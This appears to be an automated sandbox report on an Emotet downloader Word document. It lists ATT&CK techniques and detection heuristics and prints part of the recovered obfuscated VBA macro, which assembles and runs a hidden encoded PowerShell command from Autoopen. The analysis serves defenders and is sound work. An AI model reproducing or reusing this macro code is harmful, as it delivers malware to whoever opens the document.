Verdict: MALICIOUS (Risk Score: 242)

Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample is a malicious Office document whose VBA project contains an Autoopen macro. Autoopen calls a helper function that assembles a command string from concatenated string fragments and passes it to Shell() with vbHide; the recovered source shows the fragments form a PowerShell invocation with a hidden window style and an encoded (-e) command, which is consistent with downloading and running a second-stage payload. The ClamAV detection name 'Doc.Downloader.Emotet-6891475-0' attributes the document to the Emotet family's downloader stage.
Heuristics (7)
- ClamAV: Doc.Downloader.Emotet-6891475-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6891475-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard OOXML DrawingML namespace URI, not a payload location.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19297 bytes |

SHA-256: a6b3bf19de52ad33e7686f191fa3ffa5b679ce7722544c6442e460da8c8872b7

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "IsBHOtsGrB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function PFPSXQ()
On Error Resume Next
Set kLZQnT = blDSjS
cRvQCB = mXahRm + CSng(55081) + 25380 / Sin(49330 - CByte(37517) / 97746 - Round(20551)) + DVBpCs * UjQIK - (17614 + 2995 + 19167 - 6283)
Set ibHuw = ziWhIN
kTVff = QFNKu + CSng(53718) + 5303 / Sin(13404 - CByte(33755) / 44140 - Round(16745)) + SJWpWD * EhCHjK - (97656 + 12778 + 45739 - 61913)
PFPSXQ = aZBjT + XhvPEJURCOV + WDjUlArK + iZKZL + TnEpdVmQO + qIisihmKGVU + RdoiDMjKl + SbbfAS
Set pdWDmz = RMSvh
LNwpDp = wSmaZO + CSng(97485) + 63739 / Sin(99557 - CByte(92079) / 40947 - Round(59563)) + chiOPX * YFqZI - (194 + 39212 + 90875 - 37086)
End Function
Sub Autoopen()
On Error Resume Next
Set JCils = rvdYw
RQzQGF = iiZjQV + CSng(82362) + 54346 / Sin(24560 - CByte(33703) / 49380 - Round(88793)) + NlmSw * jLnSmz - (50788 + 79952 + 77571 - 48735)
mwTMhdwRzU (PFPSXQ)
Set stPRkf = VSPBui
DdvVfi = UQVSuP + CSng(75821) + 64590 / Sin(80047 - CByte(62136) / 4797 - Round(5618)) + ZffmdF * wdZhR - (17388 + 77337 + 66806 - 40698)
End Sub
Function mwTMhdwRzU(DcHwEvVuHm)
On Error Resume Next
Set UIuzXc = wpQwoc
zruFXw = sabiq + CSng(83014) + 76542 / Sin(3164 - CByte(72999) / 52953 - Round(9021)) + KMuIm * Clnnp - (12848 + 15755 + 1474 - 81771)
Set ZOjKWV = iTPhlF
DorbSX = jHDUN + CSng(41699) + 9516 / Sin(70378 - CByte(40255) / 50212 - Round(80495)) + FbXst * okLoXT - (33129 + 61709 + 81627 - 68427)
wWhsQsjSCA = Shell(auVZhhNJ + Chr(vbKeyP) + zORLjpirj + DcHwEvVuHm, vbHide)
Set PjiTd = HfqJAW
wprlAV = wzldmt + CSng(89426) + 68052 / Sin(68932 - CByte(6897) / 63590 - Round(60072)) + jFtHh * lPNDjo - (25871 + 26807 + 81705 - 66756)
End Function
Attribute VB_Name = "jfVCERuEjjv"
Function aZBjT()
On Error Resume Next
Set GcWGv = pwIkAb
WLZdhd = PKwtbB + CSng(74029) + 54594 / Sin(62474 - CByte(31294) / 35636 - Round(71863)) + MfbbA * tCozs - (57858 + 11058 + 43486 - 69133)
jfLJbQQl = "owersHeL" + "L -WinDow" + "sTyle hidde" + "n -e I" + "AAoACgAKAAi" + "AHsAMQA1AH0A" + "ewA3AD" + "EAfQB7AD"
Set QAACB = vfcit
NSsSPN = qkzdIj + CSng(92871) + 53327 / Sin(24994 - CByte(7971) / 29813 - Round(42539)) + CUPPRi * KkwzV - (58956 + 1301 + 78308 - 42358)
DRaISNPiM = "kANgB9AHsA" + "MgAwAH0AewAzAD" + "EAfQB7ADkAOAB9A" + "HsAMQA4AH0AewA" + "xADAAMgB9AH" + "sANQAyAH0A" + "ewA3ADU" + "AfQB7ADEAMA" + "AwAH0AewA"
Set aOsut = SXrTF
ibNIOq = CcAjBR + CSng(12064) + 76149 / Sin(97159 - CByte(13603) / 58171 - Round(66761)) + FHdAi * IvwsZO - (12679 + 68457 + 2390 - 40579)
XzjjodKWVYW = "1ADEAfQB7ADMA" + "MwB9AHs" + "AOAAwAH0Aew" + "AyADMAfQB7ADEAM" + "QB9AHsA"
Set NPKvTc = hqdnkU
NkzUb = MiihzF + CSng(69480) + 51594 / Sin(35050 - CByte(90235) / 64915 - Round(9680)) + MtOYM * iDTnGV - (21380 + 54962 + 53800 - 23014)
CHtXNZwQA = "MgA3AH0Ae" + "wA3ADk" + "AfQB7ADgAfQB7A" + "DYAOQB" + "9AHsANAA4AH0A" + "ewA3ADQAfQB" + "7ADUA" + "NwB9AHsANQA1A"
Set IOaXaj = czOszP
viSIWz = liwut + CSng(82288) + 46119 / Sin(23305 - CByte(73834) / 55453 - Round(15686)) + omTiv * JdvOXm - (7788 + 6700 + 84241 - 20656)
NGNAGTSmnM = "H0AewA0ADUAfQ" + "B7ADgA" + "NQB9AHsA" + "MgA0AH0AewA1ADA" + "AfQB7ADgAMwB9A"
Set sUEMRW = icjsNQ
lkkbJ = DWVNWQ + CSng(45340) + 21612 / Sin(18597 - CByte(81624) / 80283 - Round(98046)) + YtIDC * PnASF - (33272 + 30311 + 60563 - 5271)
IdUJfutA = "HsANgA2AH0Aew" + "A2ADEAfQ" + "B7ADAAfQB7ADYAM" + "AB9AHsA" + "NAAwAH0AewA5ADA" + "AfQB7ADUAOQB9AH" + "sAOQA0AH0A" + "ewAzADcAf" + "QB7ADkA" + "fQB7ADMAOQB9AH"
Set BTciij = wrqBz
UmrtA = SdhiEt + CSng(79182) + 5635 / Sin(8571 - CByte(31972) / 91808 - Round(12525)) + UYHWNQ * pXJLLV - (31415 + 36815 + 61733 - 61862)
pouowH = "sAMQAwADgAf" + "QB7ADU" + "AfQB7A" + "DkAMQB9AHsAN" + "QAzAH0AewA" + "1ADYAfQB7" + "ADEAM" + "AB9AHs" + "ANgAyAH0A"
aZBjT = jfLJbQQl + DRaISNPiM + XzjjodKWVYW + CHtXNZwQA + NGNAGTSmnM + IdUJfutA + pouowH
En ... (truncated)
```